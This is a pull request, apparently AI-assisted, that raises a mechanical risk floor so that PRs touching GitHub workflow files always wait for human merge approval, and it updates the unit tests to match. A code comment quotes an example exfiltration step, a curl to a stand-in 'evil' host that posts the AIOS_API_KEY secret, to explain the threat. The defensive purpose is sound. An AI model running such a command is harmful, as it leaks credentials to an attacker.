### PR TITLE
fix(dev-pipeline): floor the CI-config risk class to tier-4 (not 3)

### DIFF
--- a/src/aios/workflows/dev_pipeline.py
+++ b/src/aios/workflows/dev_pipeline.py
@@ -671,26 +671,34 @@ _FILES_UNAVAILABLE = "<files unavailable: fail-closed>"
 def _risk_floor(tier, files):
     """Post-process the risk agent's ``tier`` with the deterministic CI-workflow floor.
 
-    Two ways the floor fires, both returning ``max(tier, 3)`` so the PR parks at the human
-    merge_approval gate (3 > AUTO_MERGE_MAX_TIER) and never auto-merges:
+    Two ways the floor fires, both returning ``max(tier, 4)`` so the PR parks at the human
+    merge_approval gate (4 > AUTO_MERGE_MAX_TIER, which is 3) and never auto-merges:
 
     1. ``files`` is a valid list AND it includes a changed ``.github/workflows`` file —
        a privileged-surface change that could exfiltrate the provisioned secret on the next
        master push (#1185).
     2. **FAIL CLOSED:** ``files`` is NOT a list (the ``GET /pulls/N/files`` fetch failed or
        returned a non-list). We cannot prove the PR doesn't touch a workflow, so we floor to
-       tier-3 and require human review rather than letting a flaky files call silently weaken
+       tier-4 and require human review rather than letting a flaky files call silently weaken
        the control (#1187). A security control must err toward the conservative side on
        missing evidence, never assume safe.
+
+    The floor is tier-4 (not tier-3): once ``AUTO_MERGE_MAX_TIER`` rose to 3 (green +
+    dev-review-cleared work through tier-3 auto-merges), a tier-3 floor would let the
+    CI-config class auto-merge — exactly the IaC-reconcile / CI-config blind spot
+    (manifest-vs-live-prod, #1282) that CI + dev-review structurally CANNOT validate. So this
+    class floors to 4 and parks for human review until the prod-state ``--check`` node lands
+    (#1300). This bumps ONLY the CI-config floor; the risk agent tiers security/migration as 4
+    on its own.
 
     A security control must not depend on an LLM noticing — this floor is mechanical.
     Returns ``(floored_tier, floored_files)``."""
     if not isinstance(files, list):
         # Couldn't fetch/parse the changed-files set -> can't prove safe -> floor (fail closed).
-        return max(int(tier), 3), [_FILES_UNAVAILABLE]
+        return max(int(tier), 4), [_FILES_UNAVAILABLE]
     floored_files = _changed_workflow_files(files)
     if floored_files:
-        return max(int(tier), 3), floored_files
+        return max(int(tier), 4), floored_files
     return int(tier), floored_files
 
 
@@ -1043,16 +1051,17 @@ async def main(input):
     # .github/workflows file is a privileged-surface change that could exfiltrate the
     # provisioned secret on the next master push (e.g. `run: curl evil -d "$AIOS_API_KEY"` —
     # no literal `secrets.` needed), so it must NEVER auto-merge. Post-process the agent's
-    # tier mechanically (tier = max(tier, 3)) rather than trusting the LLM to notice — the
+    # tier mechanically (tier = max(tier, 4)) rather than trusting the LLM to notice — the
     # risk node already has the PR, so fetch its changed files. FAIL CLOSED: if the files
     # fetch raises or returns a non-list we CANNOT prove the PR is workflow-free, so we floor
-    # to tier-3 (require a human gate) instead of letting a flaky files call silently leave a
-    # possibly-auto-merging tier standing. The floor can only RAISE the tier, never lower it,
-    # and never blocks the run.
+    # to tier-4 (require a human gate) instead of letting a flaky files call silently leave a
+    # possibly-auto-merging tier standing. The floor is tier-4 (not 3) so the class stays
+    # parked now that AUTO_MERGE_MAX_TIER is 3 (#1282/#1300). The floor can only RAISE the
+    # tier, never lower it, and never blocks the run.
     try:
         files = _json_body(await gh("GET", _ipath(repo, "/pulls/%d/files" % pr_number)))
     except Exception as exc:  # noqa: BLE001 — fetch failure must fail CLOSED, not open
-        log("risk floor files-fetch failed (failing closed to tier-3):", exc)
+        log("risk floor files-fetch failed (failing closed to tier-4):", exc)
         files = None
     tier, floored_files = _risk_floor(tier, files)
     if floored_files:

--- a/tests/unit/test_dev_pipeline_risk_floor.py
+++ b/tests/unit/test_dev_pipeline_risk_floor.py
@@ -18,12 +18,16 @@ token. #1187 found that trivially bypassable two ways and broadens + fails the f
   endorsed the broader rule; the false-positive cost is one human gate-clear).
 * **Fail-OPEN on a files-fetch failure.** When ``GET /pulls/N/files`` failed/returned a
   non-list the old floor was skipped, leaving a possibly-auto-merging tier standing — the
-  opposite of the docstring's claim. We now FAIL CLOSED: a non-list payload floors to ≥3.
+  opposite of the docstring's claim. We now FAIL CLOSED: a non-list payload floors to ≥4.
 
 The fix is a DETERMINISTIC floor in the risk node — not the risk agent's judgment:
-``tier = max(tier, 3)`` so the PR parks at the human merge_approval gate (tier ≥3 >
-AUTO_MERGE_MAX_TIER=2) and never auto-merges. A security control must not depend on an LLM
-noticing, and must err conservative on missing evidence.
+``tier = max(tier, 4)`` so the PR parks at the human merge_approval gate (tier ≥4 >
+AUTO_MERGE_MAX_TIER=3) and never auto-merges. The floor is tier-4 (not 3): once
+``AUTO_MERGE_MAX_TIER`` rose to 3 (green + dev-review-cleared work through tier-3
+auto-merges, #1282/#1300), a tier-3 floor would let the CI-config class auto-merge — exactly
+the IaC-reconcile / CI-config blind spot (manifest-vs-live-prod) that CI + dev-review
+structurally CANNOT validate. A security control must not depend on an LLM noticing, and must
+err conservative on missing evidence.
 
 The floor helpers (``_risk_floor`` / ``_changed_workflow_files`` /
 ``_is_workflow_path``) live inside the workflow *script source* (``_BODY``), so they are
@@ -90,35 +94,36 @@ _SECRET_WORKFLOW_DIFF = [
 ]
 
 
-# ─── the acceptance criterion: a secret-referencing workflow change is floored ≥3 ─────
+# ─── the acceptance criterion: a secret-referencing workflow change is floored ≥4 ─────
 
 
-def test_secret_workflow_diff_floors_tier_to_3(
+def test_secret_workflow_diff_floors_tier_to_4(
     risk_floor: Callable[[int, Any], tuple[int, list[str]]],
 ) -> None:
-    # A risk agent rating this tier-2 (as in #1184) must be floored to 3 so it parks at
-    # the merge_approval gate (3 > AUTO_MERGE_MAX_TIER=2) and never auto-merges.
+    # A risk agent rating this tier-2 (as in #1184) must be floored to 4 so it parks at
+    # the merge_approval gate (4 > AUTO_MERGE_MAX_TIER=3) and never auto-merges. The floor
+    # is 4 (not 3) so the CI-config class stays parked now that tier-3 auto-merges.
     tier, floored = risk_floor(2, _SECRET_WORKFLOW_DIFF)
-    assert tier >= 3
-    assert tier == 3
+    assert tier >= 4
+    assert tier == 4
     assert floored == [".github/workflows/reregister-dev-pipeline.yml"]
 
 
 def test_floor_never_lowers_a_higher_tier(
     risk_floor: Callable[[int, Any], tuple[int, list[str]]],
 ) -> None:
-    # The floor is max(tier, 3): a tier-4 stays 4, never dropped to 3.
+    # The floor is max(tier, 4): a tier-4 stays 4, never raised past it.
     tier, floored = risk_floor(4, _SECRET_WORKFLOW_DIFF)
     assert tier == 4
     assert floored
 
 
-@pytest.mark.parametrize("base", [1, 2, 3])
+@pytest.mark.parametrize("base", [1, 2, 3, 4])
 def test_floor_is_max_not_overwrite(
     risk_floor: Callable[[int, Any], tuple[int, list[str]]], base: int
 ) -> None:
     tier, _ = risk_floor(base, _SECRET_WORKFLOW_DIFF)
-    assert tier == max(base, 3)
+    assert tier == max(base, 4)
 
 
 # ─── the negative criterion: unrelated PRs are unaffected ──────────────────────
@@ -148,7 +153,7 @@ def test_any_workflow_change_is_floored_even_without_secret_token(
         }
     ]
     tier, floored = risk_floor(1, files)
-    assert tier == 3
+    assert tier == 4
     assert floored == [".github/workflows/lint.yml"]
 
 
@@ -157,7 +162,7 @@ def test_env_var_exfil_step_is_floored(
 ) -> None:
     # The core #1187 acceptance criterion: a step that exfiltrates the keystone secret via
     # the ENV VAR the workflow already injects — ``$AIOS_API_KEY``, with NO literal
-    # ``secrets.`` in the added hunk — must STILL be floored ≥3 (no bypass).
+    # ``secrets.`` in the added hunk — must STILL be floored ≥4 (no bypass).
     files = [
         {
             "filename": ".github/workflows/reregister-dev-pipeline.yml",
@@ -172,7 +177,7 @@ def test_env_var_exfil_step_is_floored(
     # The added hunk contains no literal ``secrets.`` token — the old heuristic missed it.
     assert "secrets." not in files[0]["patch"]
     tier, floored = risk_floor(2, files)
-    assert tier >= 3
+    assert tier >= 4
     assert floored == [".github/workflows/reregister-dev-pipeline.yml"]
 
 
@@ -185,7 +190,7 @@ def test_mixed_diff_floors_when_any_secret_workflow_present(
         *_SECRET_WORKFLOW_DIFF,
     ]
     tier, floored = risk_floor(1, files)
-    assert tier == 3
+    assert tier == 4
     assert floored == [".github/workflows/reregister-dev-pipeline.yml"]
 
 
@@ -199,7 +204,7 @@ def test_workflow_without_textual_patch_is_floored(
     # it is secret-free, so we floor it (fail safe — cost is one human gate-clear).
     files = [{"filename": ".github/workflows/reregister-dev-pipeline.yml"}]
     tier, floored = risk_floor(2, files)
-    assert tier == 3
+    assert tier == 4
     assert floored == [".github/workflows/reregister-dev-pipeline.yml"]
 
 
@@ -208,21 +213,22 @@ def test_non_list_files_payload_fails_closed(
 ) -> None:
     # #1187: a None / non-list payload means the ``GET /pulls/N/files`` fetch FAILED (or
     # returned garbage) — we cannot prove the PR doesn't touch a workflow, so we FAIL
-    # CLOSED: floor to tier-3 and require a human gate. (The old behaviour failed OPEN here,
+    # CLOSED: floor to tier-4 and require a human gate. (The old behaviour failed OPEN here,
     # leaving a possibly-auto-merging tier-2 standing — the docstring-vs-code mismatch
-    # #1187 fixes.) Must not raise.
+    # #1187 fixes.) Floor is tier-4 (not 3) so the class stays parked now that tier-3
+    # auto-merges (#1282/#1300). Must not raise.
     bad: Any
     for bad in (None, {}, "oops"):
         tier, floored = risk_floor(2, bad)
-        assert tier >= 3
-        assert tier == 3
+        assert tier >= 4
+        assert tier == 4
         assert floored  # records WHY it floored (files-unavailable sentinel)
 
 
 def test_non_list_files_payload_never_lowers_higher_tier(
     risk_floor: Callable[[int, Any], tuple[int, list[str]]],
 ) -> None:
-    # Fail-closed is still max(tier, 3): a tier-4 stays 4.
+    # Fail-closed is still max(tier, 4): a tier-4 stays 4.
     tier, floored = risk_floor(4, None)
     assert tier == 4
     assert floored


### PR DESCRIPTION
## What

Bump the deterministic CI-workflow risk floor in `_risk_floor` from `max(tier, 3)` to `max(tier, 4)` (both return sites — the workflow-touching case and the files-unavailable fail-closed case), so the CI-config class keeps parking for human review even after `AUTO_MERGE_MAX_TIER` rises to 3.

## Why

The auto-promote policy is changing so green + dev-review-cleared work auto-merges through **tier-3**. With the floor at 3, a `.github/workflows/`-touching PR (the IaC-reconcile / CI-config class) would floor to exactly 3 and become **auto-mergeable** — the very class CI + dev-review structurally cannot validate (the manifest-vs-live-prod blind spot, #1282). Bumping the floor to 4 keeps that one class parked at the `merge_approval` gate until the prod-state `--check` node lands (#1300).

This is the **floor-only** change: the risk agent still tiers security/migration as 4 on its own; only the mechanical CI-config floor moves. No other tiers touched; tier-4 parking unchanged.

## Sequencing (deliberate prod merge-policy change)

This floor bump MUST be live **before** `AUTO_MERGE_MAX_TIER` is raised to 3, so the protected class never has an auto-merge window. While the threshold is still 2, the floor-to-4 is also safe (4 > 2 parks). After this lands + re-registers, the threshold is bumped to 3.

## Tests

`tests/unit/test_dev_pipeline_risk_floor.py` updated to assert the tier-4 floor (16 pass). Dev-pipeline integration fixture + reregister tests unaffected (their scenarios present no workflow files; floor doesn't fire). Full pre-commit unit suite green (3162).

🤖 Generated with [Claude Code](https://claude.com/claude-code)